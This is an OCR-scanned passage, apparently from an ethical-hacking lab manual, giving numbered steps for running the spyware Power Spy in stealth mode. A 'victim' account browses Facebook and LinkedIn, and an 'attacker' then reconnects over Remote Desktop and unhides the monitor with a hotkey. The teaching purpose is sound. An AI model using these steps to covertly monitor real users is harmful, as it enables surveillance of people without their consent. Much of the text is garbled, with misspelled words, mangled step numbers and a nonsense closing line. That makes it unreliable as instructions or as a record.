Hotkey reminder dialog box appears click on OK (to unhide the Power spy, Use €estealtex keys together on your PC kesboar)Mose 08- stem Hacking 29, The Confirm dialog box appears; click Yes. Dreyeretentee og 30. Close the Remote Desktop Connection. Brasn 51. Log on to the Windows Server 2012 viral machine's dason account as Se legitimate user (here, assume you ae acting sa wetim). ‘Actiios 32, Browse the Internet (anything) ot perform any ser activity. In this lab, Facebook and Linkedin websites have been browsed. 33, Once you have performed some user activities, follow atepat-8 to launch Remote Desktop Connection, (jou ae logy as an attacker). 54, To bring Power Spy out oF stealth mode, press Ctrt#Altex, "ial Nang nd Gasemcns Cy Em Tigi owed Reyne Pe